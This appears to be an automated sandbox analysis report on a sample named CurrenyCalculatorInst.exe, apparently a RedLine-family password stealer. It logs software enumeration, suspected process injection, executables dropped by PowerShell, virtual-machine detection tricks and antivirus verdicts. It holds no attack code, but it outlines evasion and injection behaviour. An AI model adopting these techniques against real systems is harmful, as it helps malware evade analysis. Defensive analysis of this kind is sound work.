RegQueryValueExW Sept. 19, 2021, 10:42 a.m.	key_handle: 0x00000708 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Acrobat Reader DC MUI regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}\DisplayName	1
RegQueryValueExW Sept. 19, 2021, 10:42 a.m.	key_handle: 0x00000708 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName	1
RegQueryValueExW Sept. 19, 2021, 10:42 a.m.	key_handle: 0x0000022c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 7-Zip 20.02 alpha regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName	1
RegQueryValueExW Sept. 19, 2021, 10:42 a.m.	key_handle: 0x0000022c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName	1
RegQueryValueExW Sept. 19, 2021, 10:42 a.m.	key_handle: 0x0000022c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
RegQueryValueExW Sept. 19, 2021, 10:42 a.m.	key_handle: 0x0000022c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: MarkAny Inc. e-PageSafer V2.5 NoAX ( Basic )_2.5.1.18 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ePageSafer\DisplayName	1
RegQueryValueExW Sept. 19, 2021, 10:42 a.m.	key_handle: 0x0000022c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExW Sept. 19, 2021, 10:42 a.m.	key_handle: 0x0000022c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName	1
RegQueryValueExW Sept. 19, 2021, 10:42 a.m.	key_handle: 0x0000022c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Mozilla Thunderbird 78.4.0 (x86 ko) regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)\DisplayName	1
RegQueryValueExW Sept. 19, 2021, 10:42 a.m.	key_handle: 0x0000022c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Professional Plus 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office14.PROPLUS\DisplayName	1
RegQueryValueExW Sept. 19, 2021, 10:42 a.m.	key_handle: 0x0000022c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: TouchEn nxKey with E2E for 32bit regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\TouchEn nxKey\DisplayName	1
RegQueryValueExW Sept. 19, 2021, 10:42 a.m.	key_handle: 0x0000022c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: INISafeWeb 5.0 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\UnINISafeWeb\DisplayName	1

Resumed a suspended thread in a remote process potentially indicative of process injection (14 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 1660 resumed a thread in remote process 1772
Process injection	Process 1660 resumed a thread in remote process 1376
Process injection	Process 1148 resumed a thread in remote process 1384
Process injection	Process 1580 resumed a thread in remote process 876
Process injection	Process 236 resumed a thread in remote process 2532
Process injection	Process 2532 resumed a thread in remote process 2040
Process injection	Process 2532 resumed a thread in remote process 1312
NtResumeThread Sept. 19, 2021, 10:42 a.m.	thread_handle: 0x00000084 suspend_count: 0 process_identifier: 1772	1	0	0
NtResumeThread Sept. 19, 2021, 10:42 a.m.	thread_handle: 0x00000088 suspend_count: 0 process_identifier: 1376	1	0	0
NtResumeThread Sept. 19, 2021, 10:43 a.m.	thread_handle: 0x00000314 suspend_count: 1 process_identifier: 1384	1	0	0
NtResumeThread Sept. 19, 2021, 10:43 a.m.	thread_handle: 0x00000334 suspend_count: 1 process_identifier: 876	1	0	0
NtResumeThread Sept. 19, 2021, 10:43 a.m.	thread_handle: 0x000000f8 suspend_count: 0 process_identifier: 2532	1	0	0
NtResumeThread Sept. 19, 2021, 10:43 a.m.	thread_handle: 0x00000314 suspend_count: 1 process_identifier: 2040	1	0	0
NtResumeThread Sept. 19, 2021, 10:43 a.m.	thread_handle: 0x00000348 suspend_count: 1 process_identifier: 1312	1	0	0

The process powershell.exe wrote an executable file to disk (20 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

Detects Virtual Machines through their custom firmware (1 event)

Time & API	Arguments	Status	Return	Repeated
NtQuerySystemInformation Sept. 19, 2021, 10:42 a.m.	information_class: 76 (SystemFirmwareTableInformation)		3221225507	0

Detects VMWare through the in instruction feature (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ Sept. 19, 2021, 10:42 a.m.	stacktrace: exception.instruction_r: ed 64 8f 05 00 00 00 00 83 c4 04 81 fb 68 58 4d exception.symbol: wwi+0x4b4fe1 exception.instruction: in eax, dx exception.module: wwi.exe exception.exception_code: 0xc0000096 exception.offset: 4935649 exception.address: 0x7d4fe1 registers.esp: 12515312 registers.edi: 6584187 registers.eax: 1447909480 registers.ebp: 4513792 registers.edx: 22104 registers.ebx: 2256917605 registers.esi: 13 registers.ecx: 10	1	0	0

File has been identified by 38 AntiVirus engines on VirusTotal as malicious (38 events)

Bkav	W32.AIDetect.malware2
Lionic	Trojan.MSIL.Reline.i!c
Elastic	malicious (high confidence)
MicroWorld-eScan	Gen:Variant.Bulz.731439
FireEye	Generic.mg.63fe4796434aad20
ALYac	Gen:Variant.Razy.912163
Cylance	Unsafe
Sangfor	Trojan.Win32.Save.a
K7AntiVirus	Trojan ( 005826bf1 )
Alibaba	TrojanPSW:MSIL/Reline.aff2c7e9
K7GW	Trojan ( 005826bf1 )
Cybereason	malicious.576632
Cyren	W32/Reline.B.gen!Eldorado
Symantec	ML.Attribute.HighConfidence
ESET-NOD32	a variant of Win32/Packed.Themida.HYR
APEX	Malicious
Paloalto	generic.ml
Kaspersky	Trojan-PSW.MSIL.Reline.hiy
BitDefender	Gen:Variant.Bulz.731439
Avast	Win32:Trojan-gen
Ad-Aware	Gen:Variant.Bulz.731439
Emsisoft	Gen:Variant.Razy.912163 (B)
McAfee-GW-Edition	BehavesLike.Win32.Browser.tc
Sophos	Mal/Generic-S
Ikarus	Trojan.Win32.Themida
GData	MSIL.Trojan-Stealer.Redline.H4C2O6
Avira	TR/RedLine.igrcw
Kingsoft	Win32.PSWTroj.Undef.(kcloud)
Microsoft	Trojan:Win32/Sabsik.FL.A!ml
Cynet	Malicious (score: 100)
AhnLab-V3	Trojan/Win.Generic.R441806
McAfee	Artemis!63FE4796434A
MAX	malware (ai score=87)
VBA32	BScope.Backdoor.Agent
Malwarebytes	Trojan.Downloader
Rising	Trojan.IPLogger/NSIS!1.C696 (CLASSIC)
AVG	Win32:Trojan-gen
CrowdStrike	win/malicious_confidence_60% (W)

CurrenyCalculatorInst.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All